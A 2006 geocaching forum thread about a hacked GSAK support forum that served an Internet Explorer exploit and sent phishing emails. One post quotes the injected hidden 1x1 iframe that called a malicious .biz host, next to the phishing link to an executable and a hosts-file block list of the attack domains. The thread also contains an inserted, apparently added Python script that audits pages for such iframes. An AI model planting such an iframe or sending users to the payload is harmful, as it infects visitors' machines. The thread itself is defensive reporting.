+Semper Questio Posted March 17, 2006
Just a warning that the GSAK support forum appears to have been hacked and is, at the moment, hosting some sort of virus. I don't know the exact nature of it, but when I went to the forums my anti-virus caught MANY hits that came VERY fast. I had to forcibly end my IE task to make it stop. I had also earlier received a bogus email passing itself off as having been from gsak.net wanting me to go to a link for an executable file that offered 'upgrades' for using the GSAK 'message boards'. Perhaps someone else has more info on this?
+geognerd Posted March 17, 2006
Could someone post when it is "safe" to go to the GSAK forum?
PghDragonRider Posted March 17, 2006
> Could someone post when it is "safe" to go to the GSAK forum?
Isn't that kind of like "Don't answer the phone unless it's me". (OK, so I'm pre Caller ID)
+embra Posted March 17, 2006
I just popped in there and didn't see anything unusual happening with my machine or connection. However, a number of people report getting the following in an email:
    tr*ffs*le1.biz/.../loadadv746.exe
    This link to a patch for our forum. Please install this patch, for correct work of a forum
Needless to say, it would be a bad idea to open that file. I haven't seen anything from Clyde, who may be just waking up from a night's rest about now.
Edit: Someone just mentioned on the board that there appears to be some spliced code on the site that exploits an Internet Explorer vulnerability. I use Firefox, which may be why my firewall/AV software wasn't freaking. If you use IE, it's probably a good idea to wait until we get an all clear here.
Edit: beejay&esskay made the most excellent suggestion to disable the potentially dangerous link. Done.
Edited March 18, 2006 by embra
+BC Chipmunks Posted March 17, 2006
> Just a warning that the GSAK support forum appears to have been hacked and is, at the moment, hosting some sort of virus. I don't know the exact nature of it, but when I went to the forums my anti-virus caught MANY hits that came VERY fast. I had to forcibly end my IE task to make it stop. I had also earlier received a bogus email passing itself off as having been from gsak.net wanting me to go to a link for an executable file that offered 'upgrades' for using the GSAK 'message boards'. Perhaps someone else has more info on this?
Just had same problem so emailed Clyde with the question I was just going to ask on the GSAK forum
+Jurgen & co Posted March 18, 2006
It cost me a lot of time and nerves to get my computer clean again. I had a loader from visiting the gsak site. And after that I became a lot of s***. After my warning I had cut the line and cleaned my computer with avg and www.hitmanpro.nl. Also I closed my firewall I installed yesterday very tight. I didn't have the time to do that yesterday. Also I became an email that looks as it came from clyde with the same loader in it so please don't open. There is a link in it with something like traficsale. You will get a lot of s***.
+TamCo Posted March 18, 2006
When I was at the GSAK Support site I received a Trojan virus. It went into my computer very fast. It took me awhile to get my computer back to working order. An all clear from someone would be nice.
+DaMoores Posted March 18, 2006
I was/am on the GSAK web site. No problems. I have Nortons AV and firefox inet. Of what you speak. That's why I don't run IE anymore.
+embra Posted March 18, 2006
Things all cleared up. Clyde cleaned up the problem, it's safe to go back in the water. (But if you got the email with that link, you *still* don't want to click it).
Suscrofa Posted March 18, 2006
Never get anything and I have neither a firewall nor antivirus ! By experience, these are on an average a bigger pain than the virus themselves. Updated software, Firefox browser and common sense are the best antivirus. Except for the one taking advantages of loophole in the OS (usually the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident. And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them transfer money, not to mention enlargement pills for what you know !
Edited March 18, 2006 by Suscrofa
+ProsperoDK Posted March 18, 2006
I posted this on the GSAK forum yesterday:
Somehow the following lines
    <body>
    <iframe src="http://traffsale1.biz/dl/adv746.php" width=1 height=1></iframe>
    <body>
have been added at the top and the bottom of the page. It's trying to use the WMF-vulnerability that went out last year, check SANS. Look for the patch from Microsoft, search for KB912919. The patch is here.
Taking the names from the SANS article and adding them to my host file pointing to 127.0.0.1 and doing the same with the names with an added 1 as in the iframe above, and applying the patch from Microsoft, I can now enter the forum without my antivirus blowing up with bells and whistles.
This is the list I added to my host file (C:\WINDOWS\system32\drivers\etc\hosts):
    127.0.0.1 traffsale.biz
    127.0.0.1 iframesite.biz
    127.0.0.1 iframetraff.biz
    127.0.0.1 toolbartraff.biz
    127.0.0.1 buytraff.biz
    127.0.0.1 iframecash.biz
    127.0.0.1 toolbarurl.biz
    127.0.0.1 iframebiz.biz
    127.0.0.1 toolbarbiz.biz
    127.0.0.1 traffsale1.biz
    127.0.0.1 iframesite1.biz
    127.0.0.1 iframetraff1.biz
    127.0.0.1 toolbartraff1.biz
    127.0.0.1 buytraff1.biz
    127.0.0.1 iframecash1.biz
    127.0.0.1 toolbarurl1.biz
    127.0.0.1 iframebiz1.biz
    127.0.0.1 toolbarbiz1.biz
After the scare I did a full scan with McAfee and Spybot - Search & Destroy and fortunately nothing got on my PC, but that took 2½-3 hours to verify. Here's another write-up on the vulnerability: pcdoctor-guide
ProsperoDK/René
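A site owner can catch the kind of injection described in the post above by auditing served pages for iframes that point off-site or are rendered invisible. The following is an added example, not part of the original thread: `forum.example` and the surrounding sample HTML are constructed placeholders, while the injected lines are the ones quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: the injected markup quoted in the post, wrapped around
# ordinary forum HTML. "forum.example" is a placeholder for the site's own host.
INJECTED = ('<body>\n<iframe src="http://traffsale1.biz/dl/adv746.php" '
            'width=1 height=1></iframe>\n<body>\n')
SAMPLE_PAGE = (
    INJECTED
    + '<html><head><title>Forum</title></head>\n<body>\n'
    + '<iframe src="/widgets/shoutbox.html" width="400" height="300"></iframe>\n'
    + '<iframe src="http://forum.example/poll" width="300" height="200"></iframe>\n'
    + '<p>Welcome</p>\n</body></html>\n'
    + INJECTED
)

_PIXELS = re.compile(r"^\s*(\d+)\s*(?:px)?\s*$", re.I)


def _is_tiny(value, limit):
    """True when a width/height attribute is a pixel count at or below limit."""
    m = _PIXELS.match(value or "")
    return bool(m) and int(m.group(1)) <= limit


class _IframeAuditor(HTMLParser):
    def __init__(self, site_host, limit):
        super().__init__()
        self.site_host, self.limit, self.findings = site_host.lower(), limit, []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        # Relative URLs have no host and count as same-site.
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site")
        if _is_tiny(a.get("width"), self.limit) or _is_tiny(a.get("height"), self.limit):
            reasons.append("tiny")
        style = re.sub(r"\s+", "", a.get("style", "")).lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden")
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))


def audit_iframes(html, site_host, limit=2):
    """Return (line, src, reasons) for every iframe that is off-site or invisible."""
    parser = _IframeAuditor(site_host, limit)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for line, src, reasons in audit_iframes(SAMPLE_PAGE, "forum.example"):
        print(f"line {line}: {src} [{', '.join(reasons)}]")
```

Run against pages as they are served rather than against templates, since this kind of injection is typically added to the output after the templates were written.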
+Kai Team Posted March 18, 2006
> Never get anything and I have neither a firewall nor antivirus !
Uh - if you have neither a firewall nor an antivirus program, how would you know if you "got anything"? That's like saying "I'm in perfect health and I have never had a medical test". Ignorance is not bliss in today's world. A scan of your computer with an up-to-date antivirus program might surprise you.
+Segerguy Posted March 18, 2006
> Never get anything and I have neither a firewall nor antivirus ! By experience, these are on an average a bigger pain than the virus themselves. Updated software, Firefox browser and common sense are the best antivirus. Except for the one taking advantages of loophole in the OS (usually the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident. And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them transfer money, not to mention enlargement pills for what you know !
You and your computer are living VERY dangerously my friend! I hope you will reconsider and get both the anti virus and the firewall.
+forman Posted March 18, 2006
> enlargement pills for what you know !
How did that work so far?
+TotemLake Posted March 18, 2006
> Never get anything and I have neither a firewall nor antivirus ! By experience, these are on an average a bigger pain than the virus themselves. Updated software, Firefox browser and common sense are the best antivirus. Except for the one taking advantages of loophole in the OS (usually the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident. And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them transfer money, not to mention enlargement pills for what you know !
Firewalls and AV programs don't stop the e-mails from coming in. Online junk filters will stop some e-mails, and locally hosted junk filters will reroute some to a folder. Firewalls keep intruders out, and AV programs protect your system from gaining the virii and trojans while on line. There are bots and worms out there now that will infiltrate your system for just being online; broadband makes it easier to happen. If you don't have anything protecting you, you're already infected and choose to ignore it in the face of all the information that is out there warning you against the lack of protection. You are gullible in your own self-assurance you don't need it unless you never go online.
+Miragee Posted March 18, 2006
> Never get anything and I have neither a firewall nor antivirus !
Before I had an Antivirus program that did automatic updates, I got a nasty Trojan three days after its presence was detected on the Internet. I had not updated my Antivirus for several days. That infection required me to reinstall my OS. After that I installed ZoneAlarm and got the AVG Antivirus.
> By experience, these are on an average a bigger pain than the virus themselves.
AVG Antivirus is free and trouble-free. I've used it for years and highly recommend it.
> Updated software, Firefox browser and common sense are the best antivirus.
I use the wonderful Opera browser and agree that using an alternate browser is much better than using IE.
> Except for the one taking advantages of loophole in the OS (usually the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident. And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them transfer money, not to mention enlargement pills for what you know !
By changing my email address/es and being very careful where they are shared, I can proudly say I no longer get those emails . . . except the ones I get because I have an eBay account. I would be curious to see the report you get if you download and run Spybot -- Search and Destroy, AdAware, and AVG Antivirus. I think you will be horrified . . .
Suscrofa Posted March 18, 2006
I update my OS regularly of course ! No shared device, no Microsoft network but just TCP/IP, I only connect to the net (10Mb/s ADSL) under a low privilege account, I use emails from MS, Yahoo and the like for general purpose. They get all the crap and sort it out for me ! My real one, only for specifics and trusted people and even, I check if what they send matches with their regular behavior. All my personal data are encrypted on PGP disks (2 separate physical disks) and never when I am on line. Most harmful stuff you get it when you act deliberately (you run an exexc while thinking it's a free movie for ex.) and most of the time received from emails. Virus are out there before your antivirus is ready to take care of it no ? Of course I regularly scan with an on line antivirus and malware programs !
+Airmapper Posted March 18, 2006
Can anyone give me the names of a free spyware/ keylogger/ and anything else software? I have avast! anti virus, and so far I think it's good. I have IE, but might consider changing it if needed. I only have a 24000bps connection, so I'm not as vulnerable as some, but I still want to keep my system secure. Any advice would be appreciated.
+Miragee Posted March 18, 2006
I didn't think anyone else had as slow a connection as mine . . . my sympathies. I have used the Free Grisoft AVG Antivirus program for many years. I really like the Opera browser. It is free now, but I liked it so much I purchased it four years ago. It is very sophisticated and loaded with features. "Spybot -- Search and Destroy" and "AdAware" are two programs that are free. They look for spyware and malware on a system.
+Toby's Gang Posted March 18, 2006
> I didn't think anyone else had as slow a connection as mine . . . my sympathies. I have used the Free Grisoft AVG Antivirus program for many years. I really like the Opera browser. It is free now, but I liked it so much I purchased it four years ago. It is very sophisticated and loaded with features. "Spybot -- Search and Destroy" and "AdAware" are two programs that are free. They look for spyware and malware on a system.
I run Microsoft Antispyware (Windows Defender as it is now called) and it's free. I've had pretty good luck with it as I haven't had any problems with spyware since I installed it. The good thing about it is it is active, which means it runs in the background like an anti-virus software does so it catches unwanted software before it has a chance to install itself.
+Airmapper Posted March 19, 2006
Thanks Miragee and Toby's Gang, that's just what I was looking for. (I didn't want to just download something I found on google.)
+Miragee Posted March 19, 2006
Just for kicks, I ran Spybot -- Search and Destroy and AdAware for the first time in more than a year. Since I use Opera, which has a different "design" from IE, I had no Adware or Spyware, at all, on this computer.
+TotemLake Posted March 19, 2006
> Just for kicks, I ran Spybot -- Search and Destroy and AdAware for the first time in more than a year. Since I use Opera, which has a different "design" from IE, I had no Adware or Spyware, at all, on this computer.
You should try spysweeper. You'll be amazed at what spybot and adaware misses.
Edited March 19, 2006 by TotemLake
+Miragee Posted March 19, 2006
Well, if I thought I needed it, and if I had $29.95, maybe I would try it. But I really think using Opera helps prevent Spyware and Adware infections, and since my computer works really well, for an old Pentium III 686, I don't need to spend that money on something non-Geocaching-related.
+Cheminer Will Posted March 19, 2006
> Never get anything and I have neither a firewall nor antivirus ! By experience, these are on an average a bigger pain than the virus themselves.
I went to the GSAK site while it was infected and my antivirus software informed me that it blocked a worm or trojan. In my mind, this one block was worth any effort spent to install and maintain the AV software! I did not get the e-mail. Some did and others didn't. Wonder what the criteria for receiving it was?
+TotemLake Posted March 20, 2006
> Well, if I thought I needed it, and if I had $29.95, maybe I would try it. But I really think using Opera helps prevent Spyware and Adware infections, and since my computer works really well, for an old Pentium III 686, I don't need to spend that money on something non-Geocaching-related.
Just for the record, my experience with all three of these products is two of them are deficient and do not catch 93% of the crud that's out there combined. I know because I used to use them and was surprised at what Spysweeper cleaned out after they declared my system clean. There is a reason why Spysweeper has been rated the best anti-spyware software for the last 5 years. I recommend this software and AVG to my customers as the best combination for keeping your system clean. MS beta anti-spyware is good, but it's about to go fee based at 49.95 p/yr.
+Miragee Posted March 20, 2006
By the way, CompUSA has a deal on SpySweeper. Free for people who are upgrading; only $10.00 for people purchasing it for the first time. I found out about that from Techbargains. If I was having any problems with my computer I would probably get it.
+Wacka Posted March 20, 2006
Best protection against viruses, adaware and malware:: Mac OSX Virus free since 1987.
arthurking83 Posted March 20, 2006
> Best protection against viruses, adaware and malware:: Mac OSX Virus free since 1987.
Ah! ...... Security by obscurity?
+Allen_L Posted March 20, 2006
> Best protection against viruses, adaware and malware:: Mac OSX Virus free since 1987.
Well at least until February 16, 2006
+Wild Thing 73 Posted March 20, 2006
> Never get anything and I have neither a firewall nor antivirus ! By experience, these are on an average a bigger pain than the virus themselves. Updated software, Firefox browser and common sense are the best antivirus. Except for the one taking advantages of loophole in the OS (usually the com layers), Browser, the vast majority of these are using loopholes of the human mind that make him gullible and overconfident. And I receive my share of emails from my "bank" asking to connect to verify my credentials, movies from Ben Laden, offer from Nigeria to help them transfer money, not to mention enlargement pills for what you know !
Congrats: you fired up the community - I have received some helpful info on Virus control, etc... I just hope your PC does not crash. I just hate it when my PC crashes. Good luck, Guy
+Team Trail Walker Posted March 20, 2006
> > Best protection against viruses, adaware and malware:: Mac OSX Virus free since 1987.
> Ah! ...... Security by obscurity?
Good luck with that! OS X in hackers' crosshairs
+Hynr Posted March 21, 2006
There seems to me to be a misconception here that Firewalls are there to deal with viruses. They might play a role there, but a firewall does much more important things; it keeps folks out of your computer. I had an old computer working as datalogger in my lab (no email, no browsing, no firewall - i.e. "wide open") hooked up to our LAN so we could get at the data from our workstations. One day our IT guys came to complain about a lot of traffic from one of our machines and we discovered that someone was using our datalogging computer as an mp3 server. It didn't take long to shut that down and to install a firewall to prevent it from happening again.
+Wacka Posted March 21, 2006
> > Best protection against viruses, adaware and malware:: Mac OSX Virus free since 1987.
> Well at least until February 16, 2006
Read the follow up articles. The guy let anyone who wanted to try have an account on the computer! That's the same as being at the keyboard. Another person put the normal settings on a Mac and had to shut the challenge down after 36 hours with no successes. There was too much traffic on the network to the Mac. Lots of people were trying, but no one could succeed.